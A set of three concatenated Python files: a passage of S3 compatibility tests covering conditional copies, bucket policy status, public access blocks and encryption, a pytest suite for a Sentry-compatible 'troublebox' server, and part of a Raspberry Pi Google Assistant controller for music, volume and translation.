# TODO: remove fails_on_rgw when https://tracker.ceph.com/issues/40808 is resolved
@attr('fails_on_rgw')
def test_copy_object_ifmatch_failed():
bucket_name = get_new_bucket()
client = get_client()
client.put_object(Bucket=bucket_name, Key='foo', Body='bar')
e = assert_raises(ClientError, client.copy_object, Bucket=bucket_name, CopySource=bucket_name+'/foo', CopySourceIfMatch='ABCORZ', Key='bar')
status, error_code = _get_status_and_error_code(e.response)
eq(status, 412)
eq(error_code, 'PreconditionFailed')
@attr(resource='object')
@attr(method='copy')
@attr(operation='copy w/ x-amz-copy-source-if-none-match: the latest ETag')
@attr(assertion='fails 412')
# TODO: remove fails_on_rgw when https://tracker.ceph.com/issues/40808 is resolved
@attr('fails_on_rgw')
def test_copy_object_ifnonematch_good():
bucket_name = get_new_bucket()
client = get_client()
resp = client.put_object(Bucket=bucket_name, Key='foo', Body='bar')
e = assert_raises(ClientError, client.copy_object, Bucket=bucket_name, CopySource=bucket_name+'/foo', CopySourceIfNoneMatch=resp['ETag'], Key='bar')
status, error_code = _get_status_and_error_code(e.response)
eq(status, 412)
eq(error_code, 'PreconditionFailed')
@attr(resource='object')
@attr(method='copy')
@attr(operation='copy w/ x-amz-copy-source-if-none-match: bogus ETag')
@attr(assertion='succeeds')
def test_copy_object_ifnonematch_failed():
bucket_name = get_new_bucket()
client = get_client()
resp = client.put_object(Bucket=bucket_name, Key='foo', Body='bar')
client.copy_object(Bucket=bucket_name, CopySource=bucket_name+'/foo', CopySourceIfNoneMatch='ABCORZ', Key='bar')
response = client.get_object(Bucket=bucket_name, Key='bar')
body = _get_body(response)
eq(body, 'bar')
@attr(resource='object')
@attr(method='get')
@attr(operation='read to invalid key')
@attr(assertion='fails 400')
# TODO: results in a 404 instead of 400 on the RGW
@attr('fails_on_rgw')
def test_object_read_unreadable():
bucket_name = get_new_bucket()
client = get_client()
e = assert_raises(ClientError, client.get_object, Bucket=bucket_name, Key='\xae\x8a-')
status, error_code = _get_status_and_error_code(e.response)
eq(status, 400)
eq(e.response['Error']['Message'], 'Couldn\'t parse the specified URI.')
@attr(resource='bucket')
@attr(method='get')
@attr(operation='Test User Policy')
@attr(assertion='succeeds')
@attr('user-policy')
def test_user_policy():
client = get_tenant_iam_client()
policy_document = json.dumps(
{"Version":"2012-10-17",
"Statement": {
"Effect":"Allow",
"Action":"*",
"Resource":"*"}}
)
client.put_user_policy(
PolicyDocument= policy_document,
PolicyName='AllAccessPolicy',
UserName=get_tenant_user_id(),
)
@attr(resource='bucket')
@attr(method='get')
@attr(operation='get bucket policy status on a new bucket')
@attr(assertion='succeeds')
@attr('policy_status')
def test_get_bucket_policy_status():
bucket_name = get_new_bucket()
client = get_client()
resp = client.get_bucket_policy_status(Bucket=bucket_name)
eq(resp['PolicyStatus']['IsPublic'],False)
@attr(resource='bucket')
@attr(method='get')
@attr(operation='get bucket policy status on a public acl bucket')
@attr(assertion='succeeds')
@attr('policy_status')
def test_get_public_acl_bucket_policy_status():
bucket_name = get_new_bucket()
client = get_client()
client = get_client()
client.put_bucket_acl(Bucket=bucket_name, ACL='public-read')
resp = client.get_bucket_policy_status(Bucket=bucket_name)
eq(resp['PolicyStatus']['IsPublic'],True)
@attr(resource='bucket')
@attr(method='get')
@attr(operation='get bucket policy status on a authenticated acl bucket')
@attr(assertion='succeeds')
@attr('policy_status')
def test_get_authpublic_acl_bucket_policy_status():
bucket_name = get_new_bucket()
client = get_client()
client = get_client()
client.put_bucket_acl(Bucket=bucket_name, ACL='authenticated-read')
resp = client.get_bucket_policy_status(Bucket=bucket_name)
eq(resp['PolicyStatus']['IsPublic'],True)
@attr(resource='bucket')
@attr(method='get')
@attr(operation='get bucket policy status on a public policy bucket')
@attr(assertion='succeeds')
@attr('policy_status')
def test_get_publicpolicy_acl_bucket_policy_status():
bucket_name = get_new_bucket()
client = get_client()
client = get_client()
resp = client.get_bucket_policy_status(Bucket=bucket_name)
eq(resp['PolicyStatus']['IsPublic'],False)
resource1 = "arn:aws:s3:::" + bucket_name
resource2 = "arn:aws:s3:::" + bucket_name + "/*"
policy_document = json.dumps(
{
"Version": "2012-10-17",
"Statement": [{
"Effect": "Allow",
"Principal": {"AWS": "*"},
"Action": "s3:ListBucket",
"Resource": [
"{}".format(resource1),
"{}".format(resource2)
]
}]
})
client.put_bucket_policy(Bucket=bucket_name, Policy=policy_document)
resp = client.get_bucket_policy_status(Bucket=bucket_name)
eq(resp['PolicyStatus']['IsPublic'],True)
@attr(resource='bucket')
@attr(method='get')
@attr(operation='get bucket policy status on a public policy bucket')
@attr(assertion='succeeds')
@attr('policy_status')
def test_get_nonpublicpolicy_acl_bucket_policy_status():
bucket_name = get_new_bucket()
client = get_client()
client = get_client()
resp = client.get_bucket_policy_status(Bucket=bucket_name)
eq(resp['PolicyStatus']['IsPublic'],False)
resource1 = "arn:aws:s3:::" + bucket_name
resource2 = "arn:aws:s3:::" + bucket_name + "/*"
policy_document = json.dumps(
{
"Version": "2012-10-17",
"Statement": [{
"Effect": "Allow",
"Principal": {"AWS": "*"},
"Action": "s3:ListBucket",
"Resource": [
"{}".format(resource1),
"{}".format(resource2)
],
"Condition": {
"IpAddress":
{"aws:SourceIp": "10.0.0.0/32"}
}
}]
})
client.put_bucket_policy(Bucket=bucket_name, Policy=policy_document)
resp = client.get_bucket_policy_status(Bucket=bucket_name)
eq(resp['PolicyStatus']['IsPublic'],False)
@attr(resource='bucket')
@attr(method='get')
@attr(operation='get bucket policy status on a public policy bucket')
@attr(assertion='succeeds')
@attr('policy_status')
def test_get_nonpublicpolicy_deny_bucket_policy_status():
bucket_name = get_new_bucket()
client = get_client()
resp = client.get_bucket_policy_status(Bucket=bucket_name)
eq(resp['PolicyStatus']['IsPublic'],False)
resource1 = "arn:aws:s3:::" + bucket_name
resource2 = "arn:aws:s3:::" + bucket_name + "/*"
policy_document = json.dumps(
{
"Version": "2012-10-17",
"Statement": [{
"Effect": "Allow",
"NotPrincipal": {"AWS": "arn:aws:iam::s3tenant1:root"},
"Action": "s3:ListBucket",
"Resource": [
"{}".format(resource1),
"{}".format(resource2)
],
}]
})
client.put_bucket_policy(Bucket=bucket_name, Policy=policy_document)
resp = client.get_bucket_policy_status(Bucket=bucket_name)
eq(resp['PolicyStatus']['IsPublic'],True)
@attr(resource='bucket')
@attr(method='get')
@attr(operation='get public access block on a bucket')
@attr(assertion='succeeds')
@attr('policy_status')
def test_get_default_public_block():
#client = get_svc_client(svc='s3control', client_config=Config(s3={'addressing_style': 'path'}))
bucket_name = get_new_bucket()
client = get_client()
resp = client.get_public_access_block(Bucket=bucket_name)
eq(resp['PublicAccessBlockConfiguration']['BlockPublicAcls'], False)
eq(resp['PublicAccessBlockConfiguration']['BlockPublicPolicy'], False)
eq(resp['PublicAccessBlockConfiguration']['IgnorePublicAcls'], False)
eq(resp['PublicAccessBlockConfiguration']['RestrictPublicBuckets'], False)
@attr(resource='bucket')
@attr(method='put')
@attr(operation='get public access block on a bucket')
@attr(assertion='succeeds')
@attr('policy_status')
def test_put_public_block():
#client = get_svc_client(svc='s3control', client_config=Config(s3={'addressing_style': 'path'}))
bucket_name = get_new_bucket()
client = get_client()
access_conf = {'BlockPublicAcls': True,
'IgnorePublicAcls': True,
'BlockPublicPolicy': True,
'RestrictPublicBuckets': False}
client.put_public_access_block(Bucket=bucket_name, PublicAccessBlockConfiguration=access_conf)
resp = client.get_public_access_block(Bucket=bucket_name)
eq(resp['PublicAccessBlockConfiguration']['BlockPublicAcls'], access_conf['BlockPublicAcls'])
eq(resp['PublicAccessBlockConfiguration']['BlockPublicPolicy'], access_conf['BlockPublicPolicy'])
eq(resp['PublicAccessBlockConfiguration']['IgnorePublicAcls'], access_conf['IgnorePublicAcls'])
eq(resp['PublicAccessBlockConfiguration']['RestrictPublicBuckets'], access_conf['RestrictPublicBuckets'])
@attr(resource='bucket')
@attr(method='put')
@attr(operation='get public access block on a bucket')
@attr(assertion='succeeds')
@attr('policy_status')
def test_block_public_put_bucket_acls():
#client = get_svc_client(svc='s3control', client_config=Config(s3={'addressing_style': 'path'}))
bucket_name = get_new_bucket()
client = get_client()
access_conf = {'BlockPublicAcls': True,
'IgnorePublicAcls': False,
'BlockPublicPolicy': True,
'RestrictPublicBuckets': False}
client.put_public_access_block(Bucket=bucket_name, PublicAccessBlockConfiguration=access_conf)
resp = client.get_public_access_block(Bucket=bucket_name)
eq(resp['PublicAccessBlockConfiguration']['BlockPublicAcls'], access_conf['BlockPublicAcls'])
eq(resp['PublicAccessBlockConfiguration']['BlockPublicPolicy'], access_conf['BlockPublicPolicy'])
e = assert_raises(ClientError, client.put_bucket_acl, Bucket=bucket_name,ACL='public-read')
status, error_code = _get_status_and_error_code(e.response)
eq(status, 403)
e = assert_raises(ClientError, client.put_bucket_acl, Bucket=bucket_name,ACL='public-read-write')
status, error_code = _get_status_and_error_code(e.response)
eq(status, 403)
e = assert_raises(ClientError, client.put_bucket_acl, Bucket=bucket_name,ACL='authenticated-read')
status, error_code = _get_status_and_error_code(e.response)
eq(status, 403)
@attr(resource='bucket')
@attr(method='put')
@attr(operation='block public acls on canned acls')
@attr(assertion='succeeds')
@attr('policy_status')
def test_block_public_object_canned_acls():
bucket_name = get_new_bucket()
client = get_client()
access_conf = {'BlockPublicAcls': True,
'IgnorePublicAcls': False,
'BlockPublicPolicy': False,
'RestrictPublicBuckets': False}
client.put_public_access_block(Bucket=bucket_name, PublicAccessBlockConfiguration=access_conf)
# resp = client.get_public_access_block(Bucket=bucket_name)
# eq(resp['PublicAccessBlockConfiguration']['BlockPublicAcls'], access_conf['BlockPublicAcls'])
# eq(resp['PublicAccessBlockConfiguration']['BlockPublicPolicy'], access_conf['BlockPublicPolicy'])
#FIXME: use empty body until #42208
e = assert_raises(ClientError, client.put_object, Bucket=bucket_name, Key='foo1', Body='', ACL='public-read')
status, error_code = _get_status_and_error_code(e.response)
eq(status, 403)
e = assert_raises(ClientError, client.put_object, Bucket=bucket_name, Key='foo2', Body='', ACL='public-read')
status, error_code = _get_status_and_error_code(e.response)
eq(status, 403)
e = assert_raises(ClientError, client.put_object, Bucket=bucket_name, Key='foo3', Body='', ACL='authenticated-read')
status, error_code = _get_status_and_error_code(e.response)
eq(status, 403)
@attr(resource='bucket')
@attr(method='put')
@attr(operation='block public acls on canned acls')
@attr(assertion='succeeds')
@attr('policy_status')
def test_block_public_policy():
bucket_name = get_new_bucket()
client = get_client()
access_conf = {'BlockPublicAcls': False,
'IgnorePublicAcls': False,
'BlockPublicPolicy': True,
'RestrictPublicBuckets': False}
client.put_public_access_block(Bucket=bucket_name, PublicAccessBlockConfiguration=access_conf)
resource = _make_arn_resource("{}/{}".format(bucket_name, "*"))
policy_document = make_json_policy("s3:GetObject",
resource)
check_access_denied(client.put_bucket_policy, Bucket=bucket_name, Policy=policy_document)
@attr(resource='bucket')
@attr(method='put')
@attr(operation='ignore public acls on canned acls')
@attr(assertion='succeeds')
@attr('policy_status')
def test_ignore_public_acls():
bucket_name = get_new_bucket()
client = get_client()
alt_client = get_alt_client()
client.put_bucket_acl(Bucket=bucket_name, ACL='public-read')
# Public bucket should be accessible
alt_client.list_objects(Bucket=bucket_name)
client.put_object(Bucket=bucket_name,Key='key1',Body='abcde',ACL='public-read')
resp=alt_client.get_object(Bucket=bucket_name, Key='key1')
eq(_get_body(resp), 'abcde')
access_conf = {'BlockPublicAcls': False,
'IgnorePublicAcls': True,
'BlockPublicPolicy': False,
'RestrictPublicBuckets': False}
client.put_public_access_block(Bucket=bucket_name, PublicAccessBlockConfiguration=access_conf)
resource = _make_arn_resource("{}/{}".format(bucket_name, "*"))
client.put_bucket_acl(Bucket=bucket_name, ACL='public-read')
# IgnorePublicACLs is true, so regardless this should behave as a private bucket
check_access_denied(alt_client.list_objects, Bucket=bucket_name)
check_access_denied(alt_client.get_object, Bucket=bucket_name, Key='key1')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='multipart upload on a bucket with a policy')
@attr(assertion='succeeds')
@attr('policy_status')
def test_multipart_upload_on_a_bucket_with_policy():
bucket_name = get_new_bucket()
client = get_client()
resource1 = "arn:aws:s3:::" + bucket_name
resource2 = "arn:aws:s3:::" + bucket_name + "/*"
policy_document = json.dumps(
{
"Version": "2012-10-17",
"Statement": [{
"Effect": "Allow",
"Principal": "*",
"Action": "*",
"Resource": [
resource1,
resource2
],
}]
})
key = "foo"
objlen=50*1024*1024
client.put_bucket_policy(Bucket=bucket_name, Policy=policy_document)
(upload_id, data, parts) = _multipart_upload(bucket_name=bucket_name, key=key, size=objlen, client=client)
response = client.complete_multipart_upload(Bucket=bucket_name, Key=key, UploadId=upload_id, MultipartUpload={'Parts': parts})
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
@attr(resource='bucket')
@attr(method='put')
@attr(operation='put bucket encryption on bucket')
@attr(assertion='succeeds')
def test_put_bucket_encryption():
bucket_name = get_new_bucket()
client = get_client()
server_side_encryption_conf = {
'Rules': [
{
'ApplyServerSideEncryptionByDefault': {
'SSEAlgorithm': 'AES256'
}
},
]
}
response = client.put_bucket_encryption(Bucket=bucket_name, ServerSideEncryptionConfiguration=server_side_encryption_conf)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
@attr(resource='bucket')
@attr(method='get')
@attr(operation='get bucket encryption on bucket')
@attr(assertion='succeeds')
def test_get_bucket_encryption():
bucket_name = get_new_bucket()
client = get_client()
response_code = ""
try:
client.get_bucket_encryption(Bucket=bucket_name)
except ClientError as e:
response_code = e.response['Error']['Code']
eq(response_code, 'ServerSideEncryptionConfigurationNotFoundError')
server_side_encryption_conf = {
'Rules': [
{
'ApplyServerSideEncryptionByDefault': {
'SSEAlgorithm': 'AES256'
}
},
]
}
client.put_bucket_encryption(Bucket=bucket_name, ServerSideEncryptionConfiguration=server_side_encryption_conf)
response = client.get_bucket_encryption(Bucket=bucket_name)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
eq(response['ServerSideEncryptionConfiguration']['Rules'][0]['ApplyServerSideEncryptionByDefault']['SSEAlgorithm'],
server_side_encryption_conf['Rules'][0]['ApplyServerSideEncryptionByDefault']['SSEAlgorithm'])
@attr(resource='bucket')
@attr(method='delete')
@attr(operation='delete bucket encryption on bucket')
@attr(assertion='succeeds')
def test_delete_bucket_encryption():
bucket_name = get_new_bucket()
client = get_client()
response = client.delete_bucket_encryption(Bucket=bucket_name)
eq(response['ResponseMetadata']['HTTPStatusCode'], 204)
server_side_encryption_conf = {
'Rules': [
{
'ApplyServerSideEncryptionByDefault': {
'SSEAlgorithm': 'AES256'
}
},
]
}
client.put_bucket_encryption(Bucket=bucket_name, ServerSideEncryptionConfiguration=server_side_encryption_conf)
response = client.delete_bucket_encryption(Bucket=bucket_name)
eq(response['ResponseMetadata']['HTTPStatusCode'], 204)
|
test_functional.py
|
from contextlib import closing
import pytest
import socket
import time
def get_open_port(host):
with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as s:
s.bind((host, 0))
s.listen(1)
port = s.getsockname()[1]
return port
def wait_for_port(host, port, timeout=60):
while timeout > 0:
with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as s:
s.settimeout(1)
if s.connect_ex((host, port)) == 0:
return
time.sleep(1)
timeout -= 1
raise RuntimeError(
"The port %s on host %s didn't become accessible" % (port, host))
@pytest.fixture
def app(tmp_path):
from troublebox import make_app
from troublebox.models import Base
import transaction
sqlite_path = tmp_path / 'troublebox.sqlite'
app = make_app(None, **{
'sqlalchemy.url': 'sqlite:///%s' % sqlite_path})
sessionmaker = app.registry['dbsession_factory']
session = sessionmaker()
Base.metadata.bind = session.bind
Base.metadata.create_all()
transaction.commit()
return app
@pytest.fixture
def testapp(app):
from webtest import TestApp
return TestApp(app)
@pytest.fixture
def troublebox_server(app):
from wsgiref.simple_server import make_server
import threading
host = 'localhost'
port = get_open_port(host)
server = make_server(host, port, app)
thread = threading.Thread(target=server.serve_forever)
thread.daemon = True
thread.start()
wait_for_port(host, port, 5)
yield server
server.shutdown()
@pytest.fixture
def sentry_url(troublebox_server):
return "http://key@%s:%s/31415" % troublebox_server.server_address
@pytest.fixture
def sentry_raven_client(sentry_url):
from raven import Client
from raven.transport.http import HTTPTransport
return Client(sentry_url, transport=HTTPTransport)
@pytest.fixture
def sentry_sdk_client(sentry_url):
from sentry_sdk.client import Client
return Client(sentry_url)
def test_raven_capture_message(sentry_raven_client, testapp):
event_id = sentry_raven_client.captureMessage("foo")
result = testapp.get('/')
(item,) = result.html.select('td.event a')
assert event_id in item.text
def test_sdk_capture_event(sentry_sdk_client, testapp):
event_id = sentry_sdk_client.capture_event(
{"message": "foo", "level": "info"})
sentry_sdk_client.transport._worker.flush(1)
result = testapp.get('/')
(item,) = result.html.select('td.event a')
assert event_id in item.text
|
main.py
|
import os
import time
import json
import yaml
import psutil
import random
import difflib
import datetime
import argparse
import requests
import traceback
import threading
import subprocess
import mediaplayer
import pathlib2 as pathlib
import google.oauth2.credentials
from gtts import gTTS
from googletrans import Translator
from google.assistant.library import Assistant
from google.assistant.library.event import EventType
from google.assistant.library.file_helpers import existing_file
from google.assistant.library.device_helpers import register_device
settings_file = open("~/google-assistant/src/settings.yaml", "r")
settings = settings_file.read()
settings = yaml.load(settings)
settings_file.close()
if settings.get("Led strips"):
import flux_led
if settings.get("Sense hat"):
from sense_hat import SenseHat
hat = SenseHat()
hat.low_light = True
hat.clear()
if settings.get("Lcd screen"):
from PIL import Image
from PIL import ImageOps
from PIL import ImageDraw
from PIL import ImageFont
from RPi import GPIO
import Adafruit_SSD1306
bsquare = int(settings.get("Square button"))
bround = int(settings.get("Round button"))
brigt = int(settings.get("Right button"))
bleft = int(settings.get("Left button"))
GPIO.setwarnings(False)
GPIO.setmode(GPIO.BCM)
GPIO.setup(bsquare, GPIO.OUT)
GPIO.setup(bround, GPIO.OUT)
GPIO.setup(brigt, GPIO.OUT)
GPIO.setup(bleft, GPIO.OUT)
GPIO.output(bsquare, GPIO.HIGH)
GPIO.output(bround, GPIO.HIGH)
GPIO.output(brigt, GPIO.HIGH)
GPIO.output(bleft, GPIO.HIGH)
font = ImageFont.load_default()
disp = Adafruit_SSD1306.SSD1306_128_64(rst = 0)
disp.begin()
disp.reset()
disp.dim(True)
disp.set_contrast(1)
disp.clear()
disp.display()
if settings.get("Weather"):
from forecastiopy import *
apikey = settings.get('Apikey')
coutry = str(settings.get('Location')).split(',')
coutry[0] = float(coutry[0])
coutry[1] = float(coutry[1])
fio = ForecastIO.ForecastIO(apikey,units='ca',latitude=coutry[1],longitude=coutry[0])
vlc = mediaplayer.vlcplayer()
class Myassistant():
def __init__(self):
var_save_file = open("~/google-assistant/src/save.yaml", "r")
self.var_save = var_save_file.read()
self.var_save = yaml.load(self.var_save)
var_save_file.close()
self.al = False
self.buton = []
self.veil = settings.get("Time stand by")*2+1
self.tink = []
self.affichage = 'heure'
self.text_say = 'Sorry I do not remeber'
self.act_cron = [[str(self.var_save.get("Music stop").split(',')[0]), str(self.var_save.get("Music stop").split(',')[1]), str(self.var_save.get("Music stop").split(',')[2]), 'vlc.stop_vlc()#cantdel']]
if settings.get("Network constraint"):
self.act_cron.append(['-',str(settings.get("Start of conection").split(',')[0]),str(settings.get("Start of conection").split(',')[1]),'os.system("sudo systemctl restart google-assistant-ok-google.service")#cantdel'])
m = str(settings.get("End of conection").split(',')[1])
h = str(settings.get("End of conection").split(',')[0])
if m == '00':
m = '59'
h = Myassistant.remove_hour(h,1)
else:
m = Myassistant.remove_min(m,1)
self.act_cron.append(['-',str(h),str(m),'self.assistant.set_mic_mute(True)#cantdel'])
if not settings.get("Add actions in crontab") == None:
for apl in settings.get("Add actions in crontab"):
self.act_cron.append(apl)
if not self.var_save.get("Alarm cron") == 'None':
for apl in self.var_save.get("Alarm cron"):
self.act_cron.append(apl)
def process_event(self,event):
print('\n'+str(event))
if 'ON_CONVERSATION_TURN_STARTED' in str(event):
if self.al == True:
self.al = False
os.system('sudo killall mpg123')
vlc.pause_vlc()
threading.Thread(target=Myassistant.sound,args=()).start()
if settings.get("Sense hat"):
threading.Thread(target=Myassistant.logo,args=()).start()
if not Myassistant.have_network(time.strftime("%H"),time.strftime("%M")):
if settings.get("Sense hat"):
Myassistant.logo_low()
vlc.resume_vlc()
if 'ON_RESPONDING_STARTED' in str(event):
vlc.pause_vlc()
if settings.get("Sense hat"):
Myassistant.logo_low()
Myassistant.logo_high()
if 'ON_ALERT_STARTED' in str(event):
vlc.pause_vlc()
if settings.get("Sense hat"):
Myassistant.logo_high()
if 'ON_ALERT_FINISHED' in str(event):
vlc.resume_vlc()
if settings.get("Sense hat"):
Myassistant.logo_low()
if 'ON_CONVERSATION_TURN_TIMEOUT' in str(event):
if settings.get("Sense hat"):
Myassistant.logo_low()
vlc.resume_vlc()
if 'ON_CONVERSATION_TURN_FINISHED' in str(event):
if settings.get("Sense hat"):
Myassistant.logo_low()
vlc.resume_vlc()
def register_device(self,project_id, credentials, device_model_id, device_id):
base_url = '/'.join([DEVICE_API_URL, 'projects', project_id, 'devices'])
device_url = '/'.join([base_url, device_id])
session = google.auth.transport.requests.AuthorizedSession(credentials)
r = session.get(device_url)
print(device_url, r.status_code)
if r.status_code == 404:
print('Registering....')
r = session.post(base_url, data=json.dumps({
'id': device_id,
'model_id': device_model_id,
'client_type': 'SDK_LIBRARY'
}))
if r.status_code != 200:
if settings.get("Sense hat"):
Myassistant.logo_high()
raise Exception('failed to register device: ' + r.text)
if settings.get("Sense hat"):
Myassistant.logo_low()
print('\rDevice registered.')
def main(self):
parser = argparse.ArgumentParser(
formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument('--device-model-id', '--device_model_id', type=str,
metavar='DEVICE_MODEL_ID', required=False,
help='the device model ID registered with Google')
parser.add_argument('--project-id', '--project_id', type=str,
metavar='PROJECT_ID', required=False,
help='the project ID used to register this device')
parser.add_argument('--device-config', type=str,
metavar='DEVICE_CONFIG_FILE',
default=os.path.join(
os.path.expanduser('~/.config'),
'googlesamples-assistant',
'device_config_library.json'
),
help='path to store and read device configuration')
parser.add_argument('--credentials', type=existing_file,
metavar='OAUTH2_CREDENTIALS_FILE',
default=os.path.join(
os.path.expanduser('~/.config'),
'google-oauthlib-tool',
'credentials.json'
),
help='path to store and read OAuth2 credentials')
parser.add_argument('-v', '--version', action='version',
version='%(prog)s ' + Assistant.__version_str__())
args = parser.parse_args()
with open(args.credentials, 'r') as f:
credentials = google.oauth2.credentials.Credentials(token=None,
**json.load(f))
device_model_id = None
last_device_id = None
try:
with open(args.device_config) as f:
device_config = json.load(f)
device_model_id = device_config['model_id']
last_device_id = device_config.get('last_device_id', None)
except FileNotFoundError:
pass
should_register = (
args.device_model_id and args.device_model_id != device_model_id)
device_model_id = self.var_save.get("Model id")
with Assistant(credentials, device_model_id) as assistant:
self.assistant = assistant
if settings.get("Lcd screen"):
Myassistant.reload_aff_heure_st(self)
Myassistant.main_heure(self)
events = assistant.start()
device_id = assistant.device_id
if should_register or (device_id != last_device_id):
if args.project_id:
register_device(args.project_id, credentials,
device_model_id, device_id)
pathlib.Path(os.path.dirname(args.device_config)).mkdir(
exist_ok=True)
with open(args.device_config, 'w') as f:
json.dump({
'last_device_id': device_id,
'model_id': device_model_id,
}, f)
self.assistant.set_mic_mute(False)
for event in events:
self.process_event(event)
brusrcmd = event.args
if event.type == EventType.ON_RECOGNIZING_SPEECH_FINISHED:
usrcmd = event.args
else:
usrcmd = {}
if event.type == EventType.ON_RECOGNIZING_SPEECH_FINISHED:
actionev = []
act = str(brusrcmd).lower()
act = act.split(": ")
act = act[1]
r = 0
while r > -1 :
if r == len(act) :
r = -1
else :
actionev.append(act[r].lower())
r = r + 1
del actionev[0]
del actionev[len(act) - 2]
del actionev[len(act) - 3]
act = "".join(actionev)
actionev = act.split(" ")
if event.type == EventType.ON_RENDER_RESPONSE:
self.text_say = ()
act = str(brusrcmd).lower()
if not '"' in act :
act = act.split("'")
i = len(act) - 1
while i > -1 :
if not 'renderresponsetype.text' in act[i] and not '}' in act[i] and not '{' in act[i] and not ':' in act[i] and not "'text'" in act[i] and not "'type'" in act[i] and not "'type'" in act[i] and not act[i] == 'text' and not act[i] == 'type' and not act[i] == ', ':
act = act[i]
i = -1
i = i - 1
else:
act = act.split('"')
i = len(act) - 1
while i > -1 :
if not 'renderresponsetype.text' in act[i] and not '}' in act[i] and not '{' in act[i] and not ':' in act[i] and not "'text'" in act[i] and not "'type'" in act[i] and not "'type'" in act[i] and not act[i] == 'text' and not act[i] == 'type' and not act[i] == ', ':
act = act[i]
i = -1
i = i - 1
self.text_say = act
if event.type == EventType.ON_RECOGNIZING_SPEECH_FINISHED:
if settings.get("Command voice"):
for command in settings.get("Command configuration"):
if command[0] in str(usrcmd).lower():
for execut in command[1]:
try:
eval(execut)
except:
print('Failed to execute "'+execut+'"')
if settings.get("Translation"):
if 'repeat in' in str(usrcmd).lower() or 'translation' in self.tink:
assistant.stop_conversation()
i = len(settings.get("Languages")) - 1
ood = True
while i > -1:
if settings.get("Languages")[i][0].lower() in str(usrcmd).lower():
ood = False
Myassistant.say(self, Myassistant.trans(Myassistant.alpha(self.text_say),settings.get("Languages")[i][1]), settings.get("Languages")[i][1])
i = i - 1
if ood == True:
if 'translation' in self.tink:
del self.tink[self.tink.index('translation')]
Myassistant.say(self, "Sorry, I don't understand.", 'en')
else:
self.tink.append('translation')
Myassistant.say(self, 'Repeat in what ?', 'en',False)
assistant.start_conversation()
elif 'translation' in self.tink:
del self.tink[self.tink.index('translation')]
if settings.get("Volume"):
if 'volume' in str(usrcmd).lower() or 'volume' in self.tink:
assistant.stop_conversation()
epo = True
if 'up' in str(usrcmd).lower():
assistant.stop_conversation()
Myassistant.volume_set(int(Myassistant.volume_get())+5)
elif 'down' in str(usrcmd).lower():
assistant.stop_conversation()
Myassistant.volume_set(int(Myassistant.volume_get())-5)
elif 'maximum' in str(usrcmd).lower():
assistant.stop_conversation()
Myassistant.volume_set(100)
elif 'minimum' in str(usrcmd).lower():
assistant.stop_conversation()
Myassistant.volume_set(0)
elif 'get' in str(usrcmd).lower():
assistant.stop_conversation()
Myassistant.say(self,"the volume is at "+str(int(Myassistant.volume_get()))+'%', 'en')
elif 'softer' in str(usrcmd).lower():
assistant.stop_conversation()
Myassistant.volume_set(int(Myassistant.volume_get())+5)
elif 'louder' in str(usrcmd).lower():
assistant.stop_conversation()
Myassistant.volume_set(int(Myassistant.volume_get())-5)
elif '%' in str(usrcmd).lower():
assistant.stop_conversation()
try:
yytr = str(usrcmd).lower().index('%')
oppm = []
ppg = True
while ppg:
yytr = yytr - 1
if str(usrcmd).lower()[yytr] == ' ':
ppg = False
else:
oppm.append(str(usrcmd).lower()[yytr])
oppm.reverse()
ll = "".join(oppm)
ll = int(ll)
Myassistant.volume_set(ll)
except:
pass
elif 'volume' in self.tink:
assistant.stop_conversation()
del self.tink[self.tink.index('volume')]
Myassistant.say(self, "Sorry, I don't understand.", 'en')
else:
epo = False
assistant.stop_conversation()
self.tink.append('volume')
Myassistant.say(self, "What do you want to do with the volume ?", 'en')
assistant.start_conversation()
if epo:
if 'volume' in self.tink:
del self.tink[self.tink.index('volume')]
elif 'softer' in str(usrcmd).lower():
assistant.stop_conversation()
Myassistant.volume_set(int(Myassistant.volume_get())+5)
elif 'louder' in str(usrcmd).lower():
assistant.stop_conversation()
Myassistant.volume_set(int(Myassistant.volume_get())-5)
if settings.get("Music"):
if str(usrcmd).lower() == "{'text': 'stop'}" and vlc.is_vlc_playing():
assistant.stop_conversation()
vlc.stop_vlc()
if str(usrcmd).lower() == "{'text': 'previous'}" in str(usrcmd).lower() and vlc.is_vlc_playing():
assistant.stop_conversation()
vlc.previous_vlc()
if str(usrcmd).lower() == "{'text': 'next'}" in str(usrcmd).lower() and vlc.is_vlc_playing():
assistant.stop_conversation()
vlc.next_vlc()
if 'music' in str(usrcmd).lower() or 'play' in str(usrcmd).lower() or 'song' in str(usrcmd).lower() or 'track' in str(usrcmd).lower():
assistant.stop_conversation()
if 'previous' in str(usrcmd).lower() and vlc.is_vlc_playing():
assistant.stop_conversation()
vlc.previous_vlc()
if 'next' in str(usrcmd).lower() and vlc.is_vlc_playing():
assistant.stop_conversation()
vlc.next_vlc()
if 'stop' in str(usrcmd).lower() and vlc.is_vlc_playing():
assistant.stop_conversation()
vlc.stop_vlc()
if 'play' in str(usrcmd).lower() or 'music' in str(usrcmd).lower():
i = len(settings.get("Radios")) - 1
while i > -1:
if settings.get("Radios")[i][0].lower() in str(usrcmd).lower():
assistant.stop_conversation()
Myassistant.say(self, Myassistant.yes() + ', ' + str(settings.get("Radios")[i][0]) + ' playback', 'en')
vlc.play_audio_file(str(settings.get("Radios")[i][1]))
i = -4
i = i - 1
if i == -1 and ('dj' in str(usrcmd).lower() or str(usrcmd).lower() == "{'text': 'music'}" or str(usrcmd).lower() == "{'text': 'play'}" or ('music' in str(usrcmd).lower() and 'play' in str(usrcmd).lower())):
assistant.stop_conversation()
Myassistant.say(self, Myassistant.yes() + ', music playback', 'en')
vlc.play_audio_folder(settings.get("Path to your music"))
elif i == -1:
mus = []
mus.extend(actionev)
if 'music' in mus :
mus.remove('music')
if 'play' in mus :
mus.remove('play')
chemin = Myassistant.cherchefichier(str(" ".join(mus)) + ".mp3",settings.get("Path to your music"))
y = True
if chemin!="" :
assistant.stop_conversation()
Myassistant.say(self, Myassistant.yes() + ', ' + str(" ".join(mus)) + ' playback', 'en')
vlc.play_audio_file(str(chemin) + "/" + str(" ".join(mus)) + ".mp3")
else:
for path, dirs, file in os.walk(settings.get("Path to your music")):
t = path.split("/")
if str(t[len(t)-1]) == str(" ".join(mus)):
assistant.stop_conversation()
